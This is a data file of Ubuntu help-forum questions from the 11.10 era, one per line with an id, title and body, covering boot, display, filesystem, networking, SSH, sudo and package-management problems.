92744	slow startup on a dell inspiron 1012	ubuntu11.10 is very slow to start up and shutdown comparing with ubuntu 11.04 . i am using ubuntu 11.10 on a mini dell inspiron 1012 ( n450 atom ) i only have one program in the startup applications and my kernel is up to date . i do n't have any old kernels in my boot list , so why does it take so much time between showing the dell logo and ubuntu logo ? i also have this problem with gnome shell can any one help me please ?
92747	ctrl alt t does n't work	i have a very strange problem on my ubuntu 11.10 desktop with gnome-shell 3.3.2 . the default shortcut to open the terminal , ctrl + alt + t does n't work . if i try to change the shortcut to antoher shortcut ( just testing ) it also does n't work . can anyone help me ?
92749	sometimes applications stay in the background and have an empty white arrow in the launcher . how do i fix this ?	sometimes an application gets in trouble with unity and then it wo n't be shown in the foreground anymore . to get to the application i have to minimize all other windows . alt-tab does n't bring the app to the foreground . this has happened with firefox and thunderbird . killing the app and restarting it doest n't help . it stays in the background after restarting it . other symptoms : the app does n't have a menu bar anymore . the white filled triangle transforms into a white arrow as shown below . only restarting the computer fixes the problem . because of the white arrow i think this might be a feature instead of a bug but i do n't understand it . how can i undo this behaviour ? i have spent about 4 hours googling it but there is not much to be found on unities triangles or applications that stay in the background .
92750	how do i restrict user bandwidth usage ?	i want to restrict each user to 300 gigabytes of internet usage per month . are there any gui or command-based tools to manager my users ' bandwidth ?
92751	create my own keyboard input layout	i need to create a keyboard layout based on a layout of a windows program . many people used this layout but its not available in ubuntu . can i do this ? p.s . would n't it make more sense to organise the keyboard layout by script not language . for instance the dzongkha language uses the same script as tibetan and has a much easier layout to learn .
92757	installation of just clang/llvm documentation ?	how do i install just the documentation and man pages of clang and llvm ? i compiled the current version from source , based on the source from the llvm website and it works fine but since it is a local self-contained repository ( it can run from your home directory assuming you have it 's bin subdirectory in your path ) it does not install the man pages or documentation . i uninstalled the ubuntu package of clang/llvm to avoid any possible conflicts but this also removed the clang man pages . how do i install just the man pages and documentation . i am ok if the man pages are technically from a couple of versions back compared to the installed compiler if necessary . thanks .
92759	ctrl+f5 in google chrome in xfce	i have installed ubuntu with unity by default , but compiz + java develop is less then sufficient with a ati graphic card , so , i installed the xubuntu-desktop package . the problem is : in google chrome ( which i use to test my web apps ) , when i press ctrl+f5 ( clean cache and refresh ) , it simply does nothing . i think this is some issue with xfce keyboard shortcuts . anyone know how to solve it ?
92762	nfs server generating `` invalid extent '' on ext4 system disk ?	i have a server running xen 4.1 with oneiric in the dom0 and each of the 4 domus . the system disks of the domus are lvm2 volumes built on top of an mdadm raid1 . all the domu system disks are ext4 and are created using snapshots of the same original template . 3 of them run perfectly , but one ( called s-ub-02 ) keeps on being remounted read-only . a subsequent e2fsck results in a single `` invalid extent '' diagnosis : e2fsck 1.41.14 ( 22-dec-2010 ) /dev/domu/s-ub-02-root contains a file system with errors , check forced . pass 1 : checking inodes , blocks , and sizes inode 525418 has an invalid extent ( logical block 8959 , invalid physical block 0 , len 0 ) clear < y > ? yes pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information /dev/domu/s-ub-02-root : 77757/655360 files ( 0.3 % non-contiguous ) , 360592/2621440 blocks the console shows typically the following errors for the system disk ( xvda2 ) : [ 101980.903416 ] ext4-fs error ( device xvda2 ) : ext4_ext_find_extent:732 : inode # 525418 : comm apt-get : bad header/extent : invalid extent entries - magic f30a , entries 12 , max 340 ( 340 ) , depth 0 ( 0 ) [ 101980.903473 ] ext4-fs ( xvda2 ) : remounting filesystem read-only i have created new versions of the system disk . the same thing always happens . this , and the fact that the disk is ultimately on a raid1 , leads me to preclude a hardware disk error . the only obvious distinguishing feature of this domu is the presence of nfs-kernel-server , so i suspect that . its exports file looks like this : /exports/users 192.168.0.0/255.255.248.0 ( rw , sync , no_subtree_check ) /exports/media/music 192.168.0.0/255.255.248.0 ( rw , sync , no_subtree_check ) /exports/media/pictures 192.168.0.0/255.255.248.0 ( rw , sync , no_subtree_check ) /exports/opt 192.168.0.0/255.255.248.0 ( rw , sync , no_subtree_check ) /exports/users and /exports/opt are lvm2 volumes from the same volume group as the system disk . /exports/media is an ext2 volume . ( there is an issue where clients see /exports/media/pictures as being a read-only volume , which i mention for completeness . ) with the exception of the read-only problem , the nfs server appears to work correctly under light load for several hours before the `` invalid extent '' problem occurs . there are no helpful entries in /var/log . all of a sudden , no more files are written , so you can see when the disk was remounted read-only , but there is no indication of what the cause might be . can anyone help me with this problem ? steve
92764	disable proxy server for one apt repository	i have made a local apt repository , but my it-department caches lan traffic on the proxy server . is there a way i could work around this to disable the proxy settings for this local apt repository ? in apt.conf or simular ?
92766	how to disable fancy visual effects in gnome shell ?	i there ! i 'm a new ubuntu user and i began with version 11.10 . i recently installed gnome shell ( gnome-shell package in ubuntu software center ) after running with ubuntu 2d . i thought it would be faster but indeed not really ( mainly ) because ( i guess ) all the fancy visual effects . however , i really love the interface and so would like to keep running with gnome shell ( not gnome classic ) . how/where can i disable all those fancy visual effects in order to work with the lightest interface i can ? thanks !
92768	webcam image has weird colors and lines over the picture	does anyone has a clue why the logitech e3500 camera stream is displayed in some kind of distored or tinted image in googletalk chat ? in both setup window and in the online video chat too . google-talk plug-in displays the picture with lines and wrong colors in it , also the resoltuion seems to be different to standard . is the plugin trying to adjust `` wide screen '' res . ? guvcview can display image correctly with 640x480 resolution cheese video is ok as well can anyone give a hint what could be the cause please ? ubuntu 11.10 64bit plugin google talk verze 2.5.6.0 plugin google talk - akcelerรกtor videa verze 0.1.44.14 : ~ $ uname -a linux doma-ms-7125 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:28:43 utc 2011 x86_64 x86_64 x86_64 gnu/linux
92772	access cuda from a ubuntu virtual machine	i have installed a guest ubuntu 10.04 on a vmware player . the host os is windows 7 pro , 32 bit . the computer has a cuda-enabled graphical card . the question is : can i access use cuda from within the virtual machine ? this is because the theano package seems to be easier to be deployed under a linux environment than for windows ... or maybe it 's just me . thanks
92776	networking for collaboration	trying to understand what features are there for local n/w in a class where a teacher gets to see on his/her monitor what has been typed by a student as an answer
92781	gnome panel crashes	i recently started to experience a problem with ubuntu 11.10 gnome panel . when i click on the standard sound icon over there , the whole panel disappears and reloads in a second or so , and i think its crashing . if this is a known bug , do you know the url of corresponding entry at launchpad ? what is the packeage responsible for running the panel ? where can i find its ( the panel 's ) logs ?
92786	ubuntu one + android - sync any file ?	i recently started playing baldur 's gate again , and since i have a decent android phone and lots of time to kill while commuting , i thought it 'd be cool to sync the saves on my laptop with my phone so i can continue playing . any ideas as how to do that ? ( not neccessarily via ubuntu one , if there are other/better alternatives ... )
92790	can not upgrade ubuntu one subscription to 45gb	i have two accounts . one is under email address a and i can not update the subscription from 25gb to 45gb . the other account is under email address b for free 5gb and i wish to cancel that account . my ubuntu one under a is full and will not allow me to add more files or upgrade . i believe the upgrade is being rejected by my bank with a country block that i have corrected , but still unable to upgrade my subscription . please advise as soon as possible as i do n't want to loose my backups .
92792	why does n't my mp3/mp4 player work on ubuntu ?	my mp3/mp4 does not plug-in and play and therefore i can not transfer any file to the mp3/mp4 dane-elec music my touch or only dane-elec with 8 gb in memory and perhapses model zt1 with radio , ..and microsdhc card slot following the above link the mp3/mp4 is there and it is mp3 player : touch my music and the complete information is on this site http : //www.danedigital.com/8-music-media-players/2-music-touch.html as the technical specifications mp3 player : touch my music the mp4 player has a very classy . it allows its users to play music and view photos and video . his fluent interface , its touch-pad , his radio and rds micro sdhc reader makes him a very complete device will become the ideal musical companion . i tried to install many applications but nothing worked . with disk utility i can see that ubuntu can recognize something , that as a peripheral device named rockchip usbdisk user and rockchip usbdisk sd , and i can plug and play other devices , and only this mp3/mp4 do not connect to the computer with ubuntu and the device as no problem working disconnected to computer i try to see if work on windows and it does ! i can see the device and transfer files to the mp3/mp4 dane-elec folder device and use fat32 . so why can not do on ubuntu ! ? what can i do and why does not work on ubuntu ? what is wrong with it ?
92794	how to change critically low battery value ?	i would like my laptop to hibernate itself when the battery level is 10 % to be sure it has enough power to complete the operation properly . actually if i do n't pay attention my laptop informs me it will hibernate when it 's too late , so instead it brutally shuts down . this kills lithium batteries and is not acceptable .
92795	monochrome icons in unity launcher	i like how the panel icons are all monochrome and would love it if this could be extended to the icons in the launcher as well . this mockup is basically what i would like to see ; i hate all the colour pollution most icons cause . the question is , is this possible ? the ccsm unity plugin does not seem to have an option for this and i can find no other plugin or application which does this . it would n't ( and should n't ) require new icons ; some sort of filter which is run when rendering the launcher would do the trick , i assume . i 'm not averse to writing something myself although i really have no idea where to start ! has anyone else ever wished for this feature , or even implemented it themselves ?
92797	how to fix the bold font rendering issue with gnome-terminal	clearly there is a problem rendering bold fonts in the terminal.the gedit version of monaco looks much better , and is rendered properly . i have also tried the monaco font on gvim , and terminator.they have the same issue ( not being rendered properly ) . only gedit seems to render it properly . what could be the reason and is there a way to fix it ?
92802	how can i install on an asus eeepc 1215b ( uefi ) ?	the installation crashes while grub is being installed . this might be due to an uefi bios bug ... is there any way to install ubuntu on the asus eeepc 1215 ?
92803	switchable graphics switching from graphic card to another	i have ubuntu 11.10 and a switchable graphics intel/ati after many and many troubles with proprietary drivers , i last uninstalled them to install the opensource alternative . but now my question is : how to choiche what vga to use ? how to know what one is use by ubuntu ? i know that i can use vgaswitcheroo but i can not find it on my installation ? anyone can help ? thanks in advance
92808	window does not get focus when opened by clicking a tray icon or a launcher icon	when i open a window by clicking an icon in the launcher bar or an icon in the tray area , sometimes the window does not get focus and gets opened behind the currently active window . i want it to open in front of all other windows and get focus . i think that should be the correct behaviour . this does not happen always and with all apps , but one example where this happens consistently is activating transmission from the tray icon menu - it always opens behind the current window . i 'm using 11.10 with unity2d .
92809	brightness problem nc110 ( samsung )	translated into english hello everyone . it looks like i 'm not the first person to have this problem , but since i 'm new in the ubuntu community , i do n't know how to launch the terminal . there you have it ; i have a nc110 ( samsung ) and i 'm not able to tweak the screen 's brightness . what are the steps to follow ? original question in french : bonjour à tous . apparemment je ne suis pas le seul à avoir ce problème mais je suis tout nouveau dans la communauté ubuntu . donc je ne sais pas comment accéder à la commande pour entrer les divers codes ... voilà , j'ai un nc110 ( samsung ) et je n'arrive pas à modifier la puissance de l'éclairage de l'écran . quelle est la marche à suivre ?
92812	is there a way to set size for maximized windows in unity ?	first , before anyone says anything , i looked at the similar questions before going ahead with this . is there a way to control your maximum size ( width/height ) of a window when maximized ? the entire reason is i use my browser maximized ( strange its the only application i do it with ) , and its annoying to have the unity panel popup most of the time when i go to click back . any ideas ? edit : added screenshot
92816	how to only apt-get upgrade certain applications ?	i only have a traffic-limited mobile broadband connection at my disposal . sudo apt-get dist-upgrade wants to get ~500mb of data which is not feasible for me right now . hence , is it possible to only upgrade certain applications , e.g . firefox ? i am quite aware that some libs must be upgraded as well , but 100mb a day wo n't hurt , 500mb do . basically , i want to split up the upgrade-process into little chunks over the month so i do n't exceed my daily quota just by downloading updates .
92826	module loaded even though it 's blacklisted	system : ubuntu 11.10 linux gray 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:50:42 utc 2011 i686 i686 i386 gnu/linux i 'm trying to blacklist a module ( rt2800usb among other ) like ; $ lsmod | grep rt rt2800usb 22300 0 rt2800lib 48717 1 rt2800usb crc_ccitt 12595 1 rt2800lib rt2x00usb 20092 1 rt2800usb rt2x00lib 48114 3 rt2800usb , rt2800lib , rt2x00usb mac80211 272785 3 rt2800lib , rt2x00usb , rt2x00lib cfg80211 172392 2 rt2x00lib , mac80211 $ emacs /etc/modprobe.d/blacklist.conf and add : blacklist rt2800usb blacklist rt2800lib blacklist rt2x00usb blacklist rt2x00lib and then : $ sudo update-initramfs -u $ sudo reboot but the module are loaded after reboot : $ lsmod | grep rt rt2800usb 22300 0 rt2800lib 48717 1 rt2800usb crc_ccitt 12595 1 rt2800lib rt2x00usb 20092 1 rt2800usb rt2x00lib 48114 3 rt2800usb , rt2800lib , rt2x00usb mac80211 272785 3 rt2800lib , rt2x00usb , rt2x00lib cfg80211 172392 2 rt2x00lib , mac80211 how do i make the changes persist ( i.e . have the modules blacklisted ) after reboot ?
92827	how do i sort the authors of a repository by the number of contributions using git ?	the name of an author is exactly the one given by the `` author '' line of a commit . when i list the authors , their names must be followed by the number of commits they have .
92829	how do i show the number of lines added ( and deleted ) in git ?	i have to display the number of lines added ( and deleted ) to a certain file by all commits .
92831	samba server wo n't let other people modify file attributes	i added this to /etc/samba/smb.conf . [ itunes ] path = /home/myusername/itunes valid users = myusername writable = yes this has the desired effect , except that for some reason i ca n't edit file attributes : i 'm assuming this is because i need to add a certain setting to my configuration . how do i grant the necessary permissions to myusername ?
92832	have put me out of admin	installed a new user and then tried to create one with the name root , because sudo nerves . didnot work and i have learnt in the meantime , this is not possible . i am now unable to login into user `` admin '' . it complains that /home/marek/.iceauthority could not be updated . i have another user which can login . sudo under the new user does not work and it complains a unsuccessful attempt has been reported . how can i fix the .iceauthority permissions to use this login ? > solution : first log in on terminal with ctrl+alt+f1 as admin , so this was possible , only on destop not . second gave me all rights in /home/marek back with boldsudo chmod -r u+rw /home/marek . for me it seems , that the error message shows .iceauthority file and there no rw-rights for admin , but really during my triing to create a root-account ubuntu has deleted my admin-rights somewhere else , because i was still admin and could change user-accounts and have given back only me all rw-rights . sounds a little bit strange .
92834	how to fix vobu read errors in k9copy ?	i am trying to backup a few dvds of mine . for this purpose , i looked at k9copy . when i start the process my terminal drowns in vobu read errors . -- and those are serious , as they are followed by four exclamation points ; ) example output : $ k9copy disc in /dev/sr0 is a video dvd disc in /dev/sr0 is a video dvd disc in /dev/sr0 is a video dvd vobu : 0 read error ! ! ! ! vobu : 52 read error ! ! ! ! vobu : 0 read error ! ! ! ! vobu : 85 read error ! ! ! ! vobu : 196 read error ! ! ! ! vobu : 316 read error ! ! ! ! vobu : 446 read error ! ! ! ! vobu : 654 read error ! ! ! ! vobu : 954 read error ! ! ! !
92850	how to remove linux from bootable partition ?	i have linux mint which i don`t need , besides my ubuntu . it resides on bootable partition . how do i remove it without destroying mbr ?
92853	mac os x formatted partitions says `` permission denied ''	so i have a 500gb external drive split into 4 partitions ( which i did in mac os x 10.5.8 ) in disk utility which are as followed . mac external drive : 155.00gb ( mac extended ) ubuntu external : 155.00gb ( mac extended ) pirate drive : 45.00gb ( mac extended ) ps3 drive : 45.00gb ( fat32 ) i never set permissions on any of these drives . i switched to ubuntu and now i 'm having this problem with moving my files around or deleting them.. on the fat32 partition i can add and delete files etc ... without issue . but on the other partitions when i try to move or delete anything it says i do n't have proper permission to do so . i have checked the permissions in ubuntu , however they are grey and wo n't allow me to change anything . i was wanting to move stuff around to free up space and install fedora 16 on a dedicated partition on my external drive but i do n't want to delete every thing on any of the partitions . any help would be fantastic for i am loosing it thinking that everything on my external drive in `` untouchable '' .
92856	how to install jailkit ?	i want to install jailkit in ubuntu http : //ubuntuforums.org/showthread.php ? t=248724 so i have downloaded jailkit http : //olivier.sessink.nl/jailkit/index.html # download after downloading i did tar then cd in to directory ./configure make ( error ) how do i install it ? i am installing ( compile ) it on ubuntu server 11.10 update ( make error ) ( asroot ) make make [ 1 ] : entering directory `/home/one/jailkit-2.14/src' gcc -lpthread -o jk_socketd jk_socketd.o jk_lib.o utils.o iniparser.o jk_socketd.o : in function `main ' : /home/one/jailkit-2.14/src/jk_socketd.c:474 : undefined reference to `pthread_create' collect2 : ld returned 1 exit status make [ 1 ] : *** [ jk_socketd ] error 1 make [ 1 ] : leaving directory `/home/one/jailkit-2.14/src' make : *** [ all ] error 2 root @ ubuntu : /home/one/jailkit-2.14 #
92857	viewing windows files	i have dual boot ubuntu 10.10 and windows 7 . how would i view my files on windows from linux ? and how would i view my linux files from windows ?
92863	mount ntfs partition at startup , with non-root user as owner	i 'm currently mounting an ntfs partition at startup using the following line in /etc/fstab : /dev/sda3 /media/data ntfs nls=iso8859-1 , umask=000 to my ubuntu 11.10 installation , it looks as if all files and folders are owned by root - and since ntfs does n't really support the same rights management system anyway , there 's no way i can change it after the mount is complete . no matter what i do , ls -l anywhere on the ntfs partition will list every file and folder as owned by root : root . however , this causes some problems for me . most notably , some applicaitons running under my account ( called tomas ) complain about access rights . also , whenever i try to copy ( cp ) or move ( mv ) files from one of my ext3 partitions to the ntfs partition , i get error messages saying mv : preserving times for [ path to new file ] : operation not permitted or , similarly mv : preserving permissions for ... would mounting the partition in my name instead of root help ? if so , how do i accomplish that in fstab ? update : i have now changed the options according to the suggestions , and arrived at this : nls=iso8859-1 , permissions , users , umask=000 , uid=tomas , gid=tomas ls -l now shows all files owned by me instead of by root , and it seems some of the problems i had before are solved . however , not all of them . when i start eclipse , i get an error that a file related to the android-sdk can not be run : permission denied . ls -l tells me the following about the file : -rwxrwxrwx 1 tomas tomas 159620 2011-11-29 14:50 adb* this looks the way i want it to . but if i try to run it ( ./adb in a terminal ) i also get permission denied errors . but if i run it with sudo , it works ( i believe - at least it does n't give me an error message , but it does n't give me any output at all , which i think it should n't ... ) why is the above file , with execute permissions for anyone , still not executable by anyone else than root ? how do i change the way i mount the file system so it is ? update 2 : ok , i 've now come a little bit further . by mounting with these options nls=iso8859-1 , permissions , users , auto i got all the permissions set the way i expect them to , and chown and chmod actually change settings on the files ( at least according to ls -l ) =d but my system still behaves in a weird way . the permissions for the adb script file come up as above , but neither i nor eclipse can run it without `` permission denied '' errors . but as far as i can see the file has all the required flags set ( o=rwx should be enough , right ? ) . why does n't it work ? update 3 ok , i got everything working on the ubuntu side , with the following options : nls=iso8859-1 , permissions , users , auto , exec however , when i try to access files on the partition from windows , the security settings are all messed up . on all the files ( of those few i 've examined ) a new account called account unknown ( long guid ) has been added to the list of users , and has full rights . rigths for most other users are decreased so that i do n't have rights to do stuff i expect . notably `` everyone '' does no longer seem to have right to `` traverse folder / execute '' . this might be solvable by just selecting the partition and allow everyone to do anything on the root folder , and then tell it to do it recursively , but i 'd rather not as i 'm afraid it will take days to complete ...
92864	sound notification in terminal	i 've never used this feature , but i think that in kde konsole terminal you can configure sound notifications . this is the screenshot : i find this useful when you execute a command client that wait for an event ( like ping ) or when finish a long script , you work in other task and hear your bell/alarm configured . it is possible to achieve this with gnome terminal ? can i install other terminal over gnome ? help me find some hack .
92872	does the reddit lens work with 11.10 ?	i 've seen that i can install a lens for reddit , but it was for ubuntu 11.04 . how is it working on ubuntu 11.10 ?
92874	how do i install windows 7 alongside a pre-existing ubuntu installation ?	i purchased a pc six months ago for work related tasks . i do 95 % of my work on ubuntu ( web development ) . now , i want to install windows on another partition to play a few games on my relax time . which steps should i follow ? any suggestions ? every guide i found suggest to install windows and , after that , ubuntu . being this my main development machine , i can not afford the risk of wiping everything .
92876	have put me out of admin update	updatet : ubuntu 11.10 64bit . error while logging in : can not update /home/marek/.iceauthority .in the meantime i can work in terminal as sudo with ctrl+alt+f1 and know , that the file has no rights for the admin-group , only for me as admin marek . so this right has to be set . also i donâ´t know the command to start from terminal the graphic-destop and must break down the system to go back .
92878	cursor running wild , then crashes on an asus g73sw	the cursor sometimes goes wild , i get random clicks , the windows are resizing , the cursor disappears . in the worst case , clicks and keyboards are disabled . i 've tried the solution given on doc.ubuntu-fr.org and add tu grub : i8042.nomux=1 i8042.reset=1 in grub_cmdline_linux_default but it did n't work what can i do ? graphic card : geforce gtx460m . ubuntu : 11.10 ( 64 bits ) . laptop asus g73sw interface : unity ( since 11.10 ) - did n't get this problem with gnome before . complement : when a window is resizing , it gets drag-boxes at every corner , center of sides and center of the window . it looks like my touchpad sends random info , or like a `` ghost '' touchscreen . lspci result : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gf106 [ geforce gtx 460m ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gf106 high definition audio controller ( rev a1 ) 03:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 04:00.0 usb controller : fresco logic fl1000g usb 3.0 host controller ( rev 04 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) edit 01-09-12 : tried on ubuntu 2d : the behavior is different : it 's like i 'm randomly clicking on the workspace switcher icon . in the worst case , it can happen several times in a minute .
92884	is there an easy way to modify samba shared folders ?	i ca n't seem to find a way.. perhaps i 'm looking in the wrong places ? i tried googling but i 've got no luck . what i 'm looking for is some sort of easy `` gui '' or something where i can just select what folders i 'd like to share . i 'm running 11.10 atm i 've also noticed that mythbuntu shared some folders by default , but i ca n't seem to figure out where those folders are located in the mythbuntu machine ...
92886	possible to change banshee 's lyric source	i discovered yesterday that banshee ( through ubuntu software center ) had an extension for lyrics and i immediately installed it . it was awesome to read and sing my favorite songs but then everything went down when journey 's - do n't stop believing had no lyric . in my world this is unacceptable . i mean come on is journey . that is like mcdonalds not selling burgers anymore . so before i quit banshee because it is breaking law # 47 of music players which states `` music players must have lyric for journey 's - do n't stop believing else smite down on it to oblivion '' i want to know : how can i change the source to grab lyrics in banshee . is there a possibility to change the url or site where it grabs the lyrics .
92890	streaming a playing song to other users via banshee or rhythmbox	is there a way to stream to my friends the song i am listening to in banshee or rhythmbox . i am not only asking for the ability to show what song i am listening to which works already by activating the telepathy extension , but also to have a way to let them hear it while i play it . when i play a song they can also hear it on their pcs .
92893	ubuntu 11.10 oneiric low disk space	i started to receive `` low disk space '' message on my ubuntu oneiric 11.04 few days ago . with gparted i see that my /dev/sda1 where is system is only 1,17 gb ! and this is obviously not enough . i have 3 more ( needed ) partitions with enough space and about 28 gb of unalocated disk space on this phisical disk . now i ca n't turn on terminal with root privileges `` failed to run /usr/bin/x-terminal-emulator as user root . '' anymore because linux is `` unable to copy the user 's xauthorization file '' . question is : can i increase my /dev/sda1 by adding this unallocated space and how to do this ? preffered with gparted if possible . i try to do this by myself but unsuccessfuly . this partition is of ntfs type and here is also system files for windows booting what i choose with grub at startup . i am not linux guru so please explanation on `` simple way '' . edit the output of df -t is : filesystem type 1k-blocks used available use % mounted on /dev/sda7 ext4 113036984 107296076 0 100 % / udev devtmpfs 1987968 4 1987964 1 % /dev tmpfs tmpfs 798356 1184 797172 1 % /run none tmpfs 5120 0 5120 0 % /run/lock none tmpfs 1995888 3736 1992152 1 % /run/shm /dev/sda3 fuseblk 16383996 9103384 7280612 56 % /media/sda3 /dev/sdc1 vfat 312492320 49250336 263241984 16 % /media/usb0 additionally , this thead is not duplicate of any other thread in ask ubuntu ! sorry , i am new here and dont know with this forum yet ! i emptyed trash already ! then get some more access to my root ... thank you ! but i see gparted livecd is for x86 machines . forgot to say i use 64bit machine and os . is this ok for me ? sure , i get useful and nice answers here and i will vote as soon i register . someone put me here automatically from `` stack-overflow '' and i am forbidden to give votes unregistered . sorry .
92898	ssh not accepting public key	i recently installed ubuntu 10.04 and trying to connect to remote servers with ssh , which is failing to connect with public key . i created the dsa keys , then did a ssh-copy-id to the remote server which created the .ssh/authorized_keys file , and permissions of 600 . i have an ssh agent running on ubuntu which accepts the password , but some of the remote systems ( f5 big ip load balancers ) still prompt me for password . i have verified the sshd_config file on the remote systems to validate nothing is different on from one system to another . the debug output on the one that works is as follows : debug1 : authentications that can continue : publickey , keyboard-interactive debug1 : next authentication method : publickey debug1 : offering public key : /home/me/.ssh/id_dsa debug1 : server accepts key : pkalg ssh-dss blen 433 debug1 : authentication succeeded ( publickey ) . debug1 : channel 0 : new [ client-session ] debug1 : entering interactive session . debug1 : sending environment . debug1 : sending env lang = en_us.utf-8 the debug output of the failed system is as follows : debug1 : authentications that can continue : publickey , keyboard-interactive debug1 : next authentication method : publickey debug1 : offering public key : /home/me/.ssh/id_dsa debug1 : authentications that can continue : publickey , keyboard-interactive debug1 : trying private key : /home/me/.ssh/id_rsa debug1 : next authentication method : keyboard-interactive password : the authorized_keys file are identical on each system , with the same permissions , and the sshd_config file are identical , as well as versions of ssh .
92899	how to disable or remove kopete ?	i do n't like kopete to start when kde 4.7 starts . but i do n't find the way to disable it - it 's not to find within the startup apps or services . when i try to uninstall the package `` kdenetwork '' gets removed also . but this package sounds important ... any help ?
92910	tell ubiquity to not install grub	i have almost convinced a family member to dual-boot with ubuntu . i 've showed him wubi , and he thinks that he 's ready to give ubuntu a try and dual boot . however , he thinks that overwriting the windows bootloader is too risky and does n't want to . i know you can restore the windows bootloader after installation of ubuntu , but that 's not what i mean . is there any option in the installer that i 'm missing to skip installing grub ? thanks for any help in advance .
92911	tor check failed though vidalia shows green onion	i have installed tor successfully and vidalia shows it is running without problems ; however , when i check if i am using tor in this website i get an error message saying i am not using tor . i have tried two things to fix this : i installed proxyswitchy on google chrome , and created a profile for tor ( with address 127.0.0.1 , port 8118 ) , but enabling the proxy does n't change the results in the tor check website linked before . i changed my network proxy settings through system settings > network from none to manual , and selected as address always 127.0.0.1 and as port 8118 for all but for the socket , for which i entered 9050 instead . this makes internet stop working completely . how can i fix this problem ?
92926	what is a safe way to upgrade over multiple releases without losing installed programs ?	i currently have ubuntu 10.10 installed and i would like to upgrade to 11.10 ( i.e . upgrading by two versions ) . there are a couple of issues : firstly , i have matlab installed , and i ca n't install this myself ( i need to get it done by it support , which can sometimes be quite difficult ) . so i 'll need to keep matlab installed across upgrades . secondly , i have custom drivers installed ( the nvidia developer drivers for using cuda ) and i 'm not sure if this is a problem . i do n't mind reinstalling this however , as they are freely available . i could click the `` upgrade now '' button in the update manager , but i will have to do this twice ( 10.10- > 11.04- > 11.10 ) . is it possible to put in an ubuntu 11.10 cd and upgrade my 10.10 install ? will this leave matlab installed ? reinstalling and copying over data might not be an option due to my need for matlab ( proprietary software , eh ? : p ) .
92930	problem accessing superuser with sudo	through virtualbox did n't allow me use usb because my account was n't a vboxuser group , i 've to run this command : $ sudo usermod -g vboxusers brallan after i needed to access to superuser privileges and was n't impossible . i 'm the only user in my computer and simply i ca n't have administrator permission . what can i do ? thanks ! pd . : when i try to use $ sudo < command > i obtain this : brallan is not in the sudoers file . this incident will be reported . it 's impossible to use sudo command .
92933	how to restart anacron every hour ?	what is the proper way to restart anacron ? i want to set it up to restart every hour . would a crontab entry like do the job ? sudo crontab -e @ hourly anacron why is anacron initially started by default from in the /etc/crontab and not in the sudo crontab ?
92934	how to change my the from : address in mutt ?	when i use mutt under ubuntu like below , my email address is shown as maemo @ maemo-tomxue . i want to change it but did n't find how to do , who could help me ? thanks ! y : send q : abort t : to c : cc s : subj a : attach file d : descrip ? : help from : maemo maemo @ maemo-tomxue to : hello @ what.com cc : bcc : subject : 111 reply-to : fcc : ~/sent mix : security : none -- attachments - i 1 /tmp/mutt-maemo-desktop-1000-4182-199622
92942	shutdown logging in ubuntu 10.04 & 11.10	when my system starts up it logs everything into syslog/dmesg . and i can review it for problems . when my system shuts down , where does that get logged ? i did n't see anything obvious in /var/log in 10.04 . ( my 11.10 system is out of reach at the moment . ) i looked at how do i turn on 'shutdown logging ' or operating system tracing ? but did n't see anything that helped . i use kubuntu , but all of the stuff at this level is probably the same .
92946	can not boot because : kernel panic - not syncing : attempted to kill init !	this is what i 've got . i can not boot and i see the two of three little lights on the keyboard blinking all the time and the cooling is working on full power , almost . i saw in other askubuntu topic suggestion for memory test . i did it . i did n't have any errors . i am 99,9 % sure it is not a hardware problem , because i have windows 7 and i can boot it and it works just fine . this problem came without any warning or something . i just turned off the laptop one day and at the other day i could n't boot . from recovery mode i get this :
92957	why is n't deja dup making room for more backups ?	i 've got deja dup ( 14.2 ) backing up to an external usb drive on lucid . up until now , i 've had `` keep backups for '' set to `` forever '' . however , after a couple of months of usage , the drive is now full . i 've tried setting the `` keep backups for '' setting to a shorter time period , even as low as one week , my assumption being that older backups would be cleared when the next backup runs . however this does n't seem to happen and i get an error message along the lines of `` can not copy temp file x to backup location y '' and the backup stops . how come space is n't being made for the new backup ?
92961	acer ao722 flickering screen	the screen on my acer aspire one netbook ( ao722 ) flickers for a few minutes when ubuntu awakens the screen after a period of inactivity . i am pretty sure this is not a hardware issue , as i never see this problem in windows and both of my acer netbooks exhibit the same problem . i see the flickering in all recent versions of ubuntu -- 11.10 , 11.04 , and 10.10 . surprisingly i have n't been able to find a lot of information about this problem online . i believe the video card in this netbook is radeon 6290 paired with amd c-60 . i am using the default open source video driver . would appreciate any tips on how to get rid of the flicker . thanks !
92967	skype using notify-osd	is there any working way setup skype to using notify-osd ? i 'm using ubuntu 11.10 and latest skype from repositories ( 2.2.0.35 ) . thanks for answer .
92968	enable wireless adaptors on dell 1018 inspiron	i have recently installed ubuntu 10.04lts -lucid lynx on a dell inspiron 1018 that came with windows 7 starter.however my wifi is not working , i found the rfkill list command and on inputting i got the message dell wifi-soft blocked no , hardblocked yes , notable is the fact that although i can see the bluetooth logo on the task bar i can also see that bluetooth also says blocked
